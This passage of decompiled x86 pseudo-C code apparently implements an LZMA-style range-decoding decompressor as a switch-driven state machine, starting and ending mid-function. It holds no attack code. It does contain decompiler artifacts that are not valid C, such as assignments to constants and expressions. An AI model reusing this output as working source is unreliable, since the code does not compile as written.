                                        													__eax =  *(__ebp - 4);
                                        													__ecx =  *(__ebp - 0x38);
                                        													 *(__ebp - 0x34) = 1;
                                        													 *(__ebp - 0x84) = 7;
                                        													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                        													while(1) {
                                        														L132:
                                        														 *(_t613 - 0x54) = _t606;
                                        														goto L133;
                                        													}
                                        												}
                                        												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                        												__esi =  *(__ebp - 0x60);
                                        												__cl = 8;
                                        												__cl = 8 -  *(__ebp - 0x3c);
                                        												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                        												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                        												__ecx =  *(__ebp - 0x3c);
                                        												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                        												__ecx =  *(__ebp - 4);
                                        												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                        												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                        												__eflags =  *(__ebp - 0x38) - 4;
                                        												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                        												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                        												if( *(__ebp - 0x38) >= 4) {
                                        													__eflags =  *(__ebp - 0x38) - 0xa;
                                        													if( *(__ebp - 0x38) >= 0xa) {
                                        														_t98 = __ebp - 0x38;
                                        														 *_t98 =  *(__ebp - 0x38) - 6;
                                        														__eflags =  *_t98;
                                        													} else {
                                        														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                        													}
                                        												} else {
                                        													 *(__ebp - 0x38) = 0;
                                        												}
                                        												__eflags =  *(__ebp - 0x34) - __edx;
                                        												if( *(__ebp - 0x34) == __edx) {
                                        													__ebx = 0;
                                        													__ebx = 1;
                                        													goto L61;
                                        												} else {
                                        													__eax =  *(__ebp - 0x14);
                                        													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                        													__eflags = __eax -  *(__ebp - 0x74);
                                        													if(__eax >=  *(__ebp - 0x74)) {
                                        														__eax = __eax +  *(__ebp - 0x74);
                                        														__eflags = __eax;
                                        													}
                                        													__ecx =  *(__ebp - 8);
                                        													__ebx = 0;
                                        													__ebx = 1;
                                        													__al =  *((intOrPtr*)(__eax + __ecx));
                                        													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                        													goto L41;
                                        												}
                                        											case 7:
                                        												__eflags =  *(__ebp - 0x40) - 1;
                                        												if( *(__ebp - 0x40) != 1) {
                                        													__eax =  *(__ebp - 0x24);
                                        													 *(__ebp - 0x80) = 0x16;
                                        													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                        													__eax =  *(__ebp - 0x28);
                                        													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                        													__eax =  *(__ebp - 0x2c);
                                        													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                        													__eax = 0;
                                        													__eflags =  *(__ebp - 0x38) - 7;
                                        													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                        													__al = __al & 0x000000fd;
                                        													__eax = (__eflags >= 0) - 1 + 0xa;
                                        													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                        													__eax =  *(__ebp - 4);
                                        													__eax =  *(__ebp - 4) + 0x664;
                                        													__eflags = __eax;
                                        													 *(__ebp - 0x58) = __eax;
                                        													goto L69;
                                        												}
                                        												__eax =  *(__ebp - 4);
                                        												__ecx =  *(__ebp - 0x38);
                                        												 *(__ebp - 0x84) = 8;
                                        												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                        												while(1) {
                                        													L132:
                                        													 *(_t613 - 0x54) = _t606;
                                        													goto L133;
                                        												}
                                        											case 8:
                                        												__eflags =  *(__ebp - 0x40);
                                        												if( *(__ebp - 0x40) != 0) {
                                        													__eax =  *(__ebp - 4);
                                        													__ecx =  *(__ebp - 0x38);
                                        													 *(__ebp - 0x84) = 0xa;
                                        													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                        												} else {
                                        													__eax =  *(__ebp - 0x38);
                                        													__ecx =  *(__ebp - 4);
                                        													__eax =  *(__ebp - 0x38) + 0xf;
                                        													 *(__ebp - 0x84) = 9;
                                        													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                        													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                        												}
                                        												while(1) {
                                        													L132:
                                        													 *(_t613 - 0x54) = _t606;
                                        													goto L133;
                                        												}
                                        											case 9:
                                        												__eflags =  *(__ebp - 0x40);
                                        												if( *(__ebp - 0x40) != 0) {
                                        													goto L89;
                                        												}
                                        												__eflags =  *(__ebp - 0x60);
                                        												if( *(__ebp - 0x60) == 0) {
                                        													goto L171;
                                        												}
                                        												__eax = 0;
                                        												__eflags =  *(__ebp - 0x38) - 7;
                                        												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                        												__eflags = _t259;
                                        												0 | _t259 = _t259 + _t259 + 9;
                                        												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                        												goto L76;
                                        											case 0xa:
                                        												goto L0;
                                        											case 0xb:
                                        												__eflags =  *(__ebp - 0x40);
                                        												if( *(__ebp - 0x40) != 0) {
                                        													__ecx =  *(__ebp - 0x24);
                                        													__eax =  *(__ebp - 0x20);
                                        													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                        												} else {
                                        													__eax =  *(__ebp - 0x24);
                                        												}
                                        												__ecx =  *(__ebp - 0x28);
                                        												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                        												goto L88;
                                        											case 0xc:
                                        												L99:
                                        												__eflags =  *(__ebp - 0x6c);
                                        												if( *(__ebp - 0x6c) == 0) {
                                        													 *(__ebp - 0x88) = 0xc;
                                        													goto L170;
                                        												}
                                        												__ecx =  *(__ebp - 0x70);
                                        												__eax =  *(__ebp - 0xc);
                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												_t334 = __ebp - 0x70;
                                        												 *_t334 =  *(__ebp - 0x70) + 1;
                                        												__eflags =  *_t334;
                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												__eax =  *(__ebp - 0x2c);
                                        												goto L101;
                                        											case 0xd:
                                        												L37:
                                        												__eflags =  *(__ebp - 0x6c);
                                        												if( *(__ebp - 0x6c) == 0) {
                                        													 *(__ebp - 0x88) = 0xd;
                                        													goto L170;
                                        												}
                                        												__ecx =  *(__ebp - 0x70);
                                        												__eax =  *(__ebp - 0xc);
                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												_t122 = __ebp - 0x70;
                                        												 *_t122 =  *(__ebp - 0x70) + 1;
                                        												__eflags =  *_t122;
                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												L39:
                                        												__eax =  *(__ebp - 0x40);
                                        												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                        												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                        													goto L48;
                                        												}
                                        												__eflags = __ebx - 0x100;
                                        												if(__ebx >= 0x100) {
                                        													goto L54;
                                        												}
                                        												L41:
                                        												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                        												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                        												__ecx =  *(__ebp - 0x58);
                                        												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                        												 *(__ebp - 0x48) = __eax;
                                        												__eax = __eax + 1;
                                        												__eax = __eax << 8;
                                        												__eax = __eax + __ebx;
                                        												__esi =  *(__ebp - 0x58) + __eax * 2;
                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                        												__ax =  *__esi;
                                        												 *(__ebp - 0x54) = __esi;
                                        												__edx = __ax & 0x0000ffff;
                                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                        												__eflags =  *(__ebp - 0xc) - __ecx;
                                        												if( *(__ebp - 0xc) >= __ecx) {
                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                        													__cx = __ax;
                                        													 *(__ebp - 0x40) = 1;
                                        													__cx = __ax >> 5;
                                        													__eflags = __eax;
                                        													__ebx = __ebx + __ebx + 1;
                                        													 *__esi = __ax;
                                        												} else {
                                        													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                        													 *(__ebp - 0x10) = __ecx;
                                        													0x800 = 0x800 - __edx;
                                        													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                        													__ebx = __ebx + __ebx;
                                        													 *__esi = __cx;
                                        												}
                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        												 *(__ebp - 0x44) = __ebx;
                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                        													goto L39;
                                        												} else {
                                        													goto L37;
                                        												}
                                        											case 0xe:
                                        												L46:
                                        												__eflags =  *(__ebp - 0x6c);
                                        												if( *(__ebp - 0x6c) == 0) {
                                        													 *(__ebp - 0x88) = 0xe;
                                        													goto L170;
                                        												}
                                        												__ecx =  *(__ebp - 0x70);
                                        												__eax =  *(__ebp - 0xc);
                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												_t156 = __ebp - 0x70;
                                        												 *_t156 =  *(__ebp - 0x70) + 1;
                                        												__eflags =  *_t156;
                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												while(1) {
                                        													L48:
                                        													__eflags = __ebx - 0x100;
                                        													if(__ebx >= 0x100) {
                                        														break;
                                        													}
                                        													__eax =  *(__ebp - 0x58);
                                        													__edx = __ebx + __ebx;
                                        													__ecx =  *(__ebp - 0x10);
                                        													__esi = __edx + __eax;
                                        													__ecx =  *(__ebp - 0x10) >> 0xb;
                                        													__ax =  *__esi;
                                        													 *(__ebp - 0x54) = __esi;
                                        													__edi = __ax & 0x0000ffff;
                                        													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                        													__eflags =  *(__ebp - 0xc) - __ecx;
                                        													if( *(__ebp - 0xc) >= __ecx) {
                                        														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                        														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                        														__cx = __ax;
                                        														_t170 = __edx + 1; // 0x1
                                        														__ebx = _t170;
                                        														__cx = __ax >> 5;
                                        														__eflags = __eax;
                                        														 *__esi = __ax;
                                        													} else {
                                        														 *(__ebp - 0x10) = __ecx;
                                        														0x800 = 0x800 - __edi;
                                        														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                        														__ebx = __ebx + __ebx;
                                        														 *__esi = __cx;
                                        													}
                                        													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        													 *(__ebp - 0x44) = __ebx;
                                        													if( *(__ebp - 0x10) >= 0x1000000) {
                                        														continue;
                                        													} else {
                                        														goto L46;
                                        													}
                                        												}
                                        												L54:
                                        												_t173 = __ebp - 0x34;
                                        												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                        												__eflags =  *_t173;
                                        												goto L55;
                                        											case 0xf:
                                        												L58:
                                        												__eflags =  *(__ebp - 0x6c);
                                        												if( *(__ebp - 0x6c) == 0) {
                                        													 *(__ebp - 0x88) = 0xf;
                                        													goto L170;
                                        												}
                                        												__ecx =  *(__ebp - 0x70);
                                        												__eax =  *(__ebp - 0xc);
                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												_t203 = __ebp - 0x70;
                                        												 *_t203 =  *(__ebp - 0x70) + 1;
                                        												__eflags =  *_t203;
                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												L60:
                                        												__eflags = __ebx - 0x100;
                                        												if(__ebx >= 0x100) {
                                        													L55:
                                        													__al =  *(__ebp - 0x44);
                                        													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                        													goto L56;
                                        												}
                                        												L61:
                                        												__eax =  *(__ebp - 0x58);
                                        												__edx = __ebx + __ebx;
                                        												__ecx =  *(__ebp - 0x10);
                                        												__esi = __edx + __eax;
                                        												__ecx =  *(__ebp - 0x10) >> 0xb;
                                        												__ax =  *__esi;
                                        												 *(__ebp - 0x54) = __esi;
                                        												__edi = __ax & 0x0000ffff;
                                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                        												__eflags =  *(__ebp - 0xc) - __ecx;
                                        												if( *(__ebp - 0xc) >= __ecx) {
                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                        													__cx = __ax;
                                        													_t217 = __edx + 1; // 0x1
                                        													__ebx = _t217;
                                        													__cx = __ax >> 5;
                                        													__eflags = __eax;
                                        													 *__esi = __ax;
                                        												} else {
                                        													 *(__ebp - 0x10) = __ecx;
                                        													0x800 = 0x800 - __edi;
                                        													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                        													__ebx = __ebx + __ebx;
                                        													 *__esi = __cx;
                                        												}
                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        												 *(__ebp - 0x44) = __ebx;
                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                        													goto L60;
                                        												} else {
                                        													goto L58;
                                        												}
                                        											case 0x10:
                                        												L109:
                                        												__eflags =  *(__ebp - 0x6c);
                                        												if( *(__ebp - 0x6c) == 0) {
                                        													 *(__ebp - 0x88) = 0x10;
                                        													goto L170;
                                        												}
                                        												__ecx =  *(__ebp - 0x70);
                                        												__eax =  *(__ebp - 0xc);
                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												_t365 = __ebp - 0x70;
                                        												 *_t365 =  *(__ebp - 0x70) + 1;
                                        												__eflags =  *_t365;
                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												goto L111;
                                        											case 0x11:
                                        												goto L69;
                                        											case 0x12:
                                        												__eflags =  *(__ebp - 0x40);
                                        												if( *(__ebp - 0x40) != 0) {
                                        													__eax =  *(__ebp - 0x58);
                                        													 *(__ebp - 0x84) = 0x13;
                                        													__esi =  *(__ebp - 0x58) + 2;
                                        													while(1) {
                                        														L132:
                                        														 *(_t613 - 0x54) = _t606;
                                        														goto L133;
                                        													}
                                        												}
                                        												__eax =  *(__ebp - 0x4c);
                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                        												__ecx =  *(__ebp - 0x58);
                                        												__eax =  *(__ebp - 0x4c) << 4;
                                        												__eflags = __eax;
                                        												__eax =  *(__ebp - 0x58) + __eax + 4;
                                        												goto L130;
                                        											case 0x13:
                                        												__eflags =  *(__ebp - 0x40);
                                        												if( *(__ebp - 0x40) != 0) {
                                        													_t469 = __ebp - 0x58;
                                        													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                        													__eflags =  *_t469;
                                        													 *(__ebp - 0x30) = 0x10;
                                        													 *(__ebp - 0x40) = 8;
                                        													L144:
                                        													 *(__ebp - 0x7c) = 0x14;
                                        													goto L145;
                                        												}
                                        												__eax =  *(__ebp - 0x4c);
                                        												__ecx =  *(__ebp - 0x58);
                                        												__eax =  *(__ebp - 0x4c) << 4;
                                        												 *(__ebp - 0x30) = 8;
                                        												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                        												L130:
                                        												 *(__ebp - 0x58) = __eax;
                                        												 *(__ebp - 0x40) = 3;
                                        												goto L144;
                                        											case 0x14:
                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                        												__eax =  *(__ebp - 0x80);
                                        												 *(_t613 - 0x88) = _t533;
                                        												goto L1;
                                        											case 0x15:
                                        												__eax = 0;
                                        												__eflags =  *(__ebp - 0x38) - 7;
                                        												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                        												__al = __al & 0x000000fd;
                                        												__eax = (__eflags >= 0) - 1 + 0xb;
                                        												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                        												goto L120;
                                        											case 0x16:
                                        												__eax =  *(__ebp - 0x30);
                                        												__eflags = __eax - 4;
                                        												if(__eax >= 4) {
                                        													_push(3);
                                        													_pop(__eax);
                                        												}
                                        												__ecx =  *(__ebp - 4);
                                        												 *(__ebp - 0x40) = 6;
                                        												__eax = __eax << 7;
                                        												 *(__ebp - 0x7c) = 0x19;
                                        												 *(__ebp - 0x58) = __eax;
                                        												goto L145;
                                        											case 0x17:
                                        												L145:
                                        												__eax =  *(__ebp - 0x40);
                                        												 *(__ebp - 0x50) = 1;
                                        												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                        												goto L149;
                                        											case 0x18:
                                        												L146:
                                        												__eflags =  *(__ebp - 0x6c);
                                        												if( *(__ebp - 0x6c) == 0) {
                                        													 *(__ebp - 0x88) = 0x18;
                                        													goto L170;
                                        												}
                                        												__ecx =  *(__ebp - 0x70);
                                        												__eax =  *(__ebp - 0xc);
                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												_t484 = __ebp - 0x70;
                                        												 *_t484 =  *(__ebp - 0x70) + 1;
                                        												__eflags =  *_t484;
                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        												L148:
                                        												_t487 = __ebp - 0x48;
                                        												 *_t487 =  *(__ebp - 0x48) - 1;
                                        												__eflags =  *_t487;
                                        												L149:
                                        												__eflags =  *(__ebp - 0x48);
                                        												if( *(__ebp - 0x48) <= 0) {
                                        													__ecx =  *(__ebp - 0x40);
                                        													__ebx =  *(__ebp - 0x50);
                                        													0 = 1;
                                        													__eax = 1 << __cl;
                                        													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                        													__eax =  *(__ebp - 0x7c);
                                        													 *(__ebp - 0x44) = __ebx;
                                        													while(1) {
                                        														 *(_t613 - 0x88) = _t533;
                                        														goto L1;
                                        													}
                                        												}
                                        												__eax =  *(__ebp - 0x50);
                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                        												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                        												__eax =  *(__ebp - 0x58);
                                        												__esi = __edx + __eax;
                                        												 *(__ebp - 0x54) = __esi;
                                        												__ax =  *__esi;
                                        												__edi = __ax & 0x0000ffff;
                                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                        												__eflags =  *(__ebp - 0xc) - __ecx;
                                        												if( *(__ebp - 0xc) >= __ecx) {
                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                        													__cx = __ax;
                                        													__cx = __ax >> 5;
                                        													__eax = __eax - __ecx;
                                        													__edx = __edx + 1;
                                        													__eflags = __edx;
                                        													 *__esi = __ax;
                                        													 *(__ebp - 0x50) = __edx;
                                        												} else {
                                        													 *(__ebp - 0x10) = __ecx;
                                        													0x800 = 0x800 - __edi;
                                        													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                        													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                        													 *__esi = __cx;
                                        												}
                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                        													goto L148;
                                        												} else {
                                        													goto L146;
                                        												}
                                        											case 0x19:
                                        												__eflags = __ebx - 4;
                                        												if(__ebx < 4) {
                                        													 *(__ebp - 0x2c) = __ebx;
                                        													L119:
                                        													_t393 = __ebp - 0x2c;
                                        													 *_t393 =  *(__ebp - 0x2c) + 1;
                                        													__eflags =  *_t393;
                                        													L120:
                                        													__eax =  *(__ebp - 0x2c);
                                        													__eflags = __eax;
                                        													if(__eax == 0) {
                                        														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                        														goto L170;
                                        													}
                                        													__eflags = __eax -  *(__ebp - 0x60);
                                        													if(__eax >  *(__ebp - 0x60)) {
                                        														goto L171;
                                        													}
                                        													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                        													__eax =  *(__ebp - 0x30);
                                        													_t400 = __ebp - 0x60;
                                        													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                        													__eflags =  *_t400;
                                        													goto L123;
                                        												}
                                        												__ecx = __ebx;
                                        												__eax = __ebx;
                                        												__ecx = __ebx >> 1;
                                        												__eax = __ebx & 0x00000001;
                                        												__ecx = (__ebx >> 1) - 1;
                                        												__al = __al | 0x00000002;
                                        												__eax = (__ebx & 0x00000001) << __cl;
                                        												__eflags = __ebx - 0xe;
                                        												 *(__ebp - 0x2c) = __eax;
                                        												if(__ebx >= 0xe) {
                                        													__ebx = 0;
                                        													 *(__ebp - 0x48) = __ecx;
                                        													L102:
                                        													__eflags =  *(__ebp - 0x48);
                                        													if( *(__ebp - 0x48) <= 0) {
                                        														__eax = __eax + __ebx;
                                        														 *(__ebp - 0x40) = 4;
                                        														 *(__ebp - 0x2c) = __eax;
                                        														__eax =  *(__ebp - 4);
                                        														__eax =  *(__ebp - 4) + 0x644;
                                        														__eflags = __eax;
                                        														L108:
                                        														__ebx = 0;
                                        														 *(__ebp - 0x58) = __eax;
                                        														 *(__ebp - 0x50) = 1;
                                        														 *(__ebp - 0x44) = 0;
                                        														 *(__ebp - 0x48) = 0;
                                        														L112:
                                        														__eax =  *(__ebp - 0x40);
                                        														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                        														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                        															_t391 = __ebp - 0x2c;
                                        															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                        															__eflags =  *_t391;
                                        															goto L119;
                                        														}
                                        														__eax =  *(__ebp - 0x50);
                                        														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                        														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                        														__eax =  *(__ebp - 0x58);
                                        														__esi = __edi + __eax;
                                        														 *(__ebp - 0x54) = __esi;
                                        														__ax =  *__esi;
                                        														__ecx = __ax & 0x0000ffff;
                                        														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                        														__eflags =  *(__ebp - 0xc) - __edx;
                                        														if( *(__ebp - 0xc) >= __edx) {
                                        															__ecx = 0;
                                        															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                        															__ecx = 1;
                                        															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                        															__ebx = 1;
                                        															__ecx =  *(__ebp - 0x48);
                                        															__ebx = 1 << __cl;
                                        															__ecx = 1 << __cl;
                                        															__ebx =  *(__ebp - 0x44);
                                        															__ebx =  *(__ebp - 0x44) | __ecx;
                                        															__cx = __ax;
                                        															__cx = __ax >> 5;
                                        															__eax = __eax - __ecx;
                                        															__edi = __edi + 1;
                                        															__eflags = __edi;
                                        															 *(__ebp - 0x44) = __ebx;
                                        															 *__esi = __ax;
                                        															 *(__ebp - 0x50) = __edi;
                                        														} else {
                                        															 *(__ebp - 0x10) = __edx;
                                        															0x800 = 0x800 - __ecx;
                                        															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                        															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                        															 *__esi = __dx;
                                        														}
                                        														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        														if( *(__ebp - 0x10) >= 0x1000000) {
                                        															L111:
                                        															_t368 = __ebp - 0x48;
                                        															 *_t368 =  *(__ebp - 0x48) + 1;
                                        															__eflags =  *_t368;
                                        															goto L112;
                                        														} else {
                                        															goto L109;
                                        														}
                                        													}
                                        													__ecx =  *(__ebp - 0xc);
                                        													__ebx = __ebx + __ebx;
                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                        													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                        													 *(__ebp - 0x44) = __ebx;
                                        													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                        														__ecx =  *(__ebp - 0x10);
                                        														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                        														__ebx = __ebx | 0x00000001;
                                        														__eflags = __ebx;
                                        														 *(__ebp - 0x44) = __ebx;
                                        													}
                                        													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        													if( *(__ebp - 0x10) >= 0x1000000) {
                                        														L101:
                                        														_t338 = __ebp - 0x48;
                                        														 *_t338 =  *(__ebp - 0x48) - 1;
                                        														__eflags =  *_t338;
                                        														goto L102;
                                        													} else {
                                        														goto L99;
                                        													}
                                        												}
                                        												__edx =  *(__ebp - 4);
                                        												__eax = __eax - __ebx;
                                        												 *(__ebp - 0x40) = __ecx;
                                        												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                        												goto L108;
                                        											case 0x1a:
                                        												L56:
                                        												__eflags =  *(__ebp - 0x64);
                                        												if( *(__ebp - 0x64) == 0) {
                                        													 *(__ebp - 0x88) = 0x1a;
                                        													goto L170;
                                        												}
                                        												__ecx =  *(__ebp - 0x68);
                                        												__al =  *(__ebp - 0x5c);
                                        												__edx =  *(__ebp - 8);
                                        												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                        												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                        												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                        												 *( *(__ebp - 0x68)) = __al;
                                        												__ecx =  *(__ebp - 0x14);
                                        												 *(__ecx +  *(__ebp - 8)) = __al;
                                        												__eax = __ecx + 1;
                                        												__edx = 0;
                                        												_t192 = __eax %  *(__ebp - 0x74);
                                        												__eax = __eax /  *(__ebp - 0x74);
                                        												__edx = _t192;
                                        												goto L80;
                                        											case 0x1b:
                                        												L76:
                                        												__eflags =  *(__ebp - 0x64);
                                        												if( *(__ebp - 0x64) == 0) {
                                        													 *(__ebp - 0x88) = 0x1b;
                                        													goto L170;
                                        												}
                                        												__eax =  *(__ebp - 0x14);
                                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                        												__eflags = __eax -  *(__ebp - 0x74);
                                        												if(__eax >=  *(__ebp - 0x74)) {
                                        													__eax = __eax +  *(__ebp - 0x74);
                                        													__eflags = __eax;
                                        												}
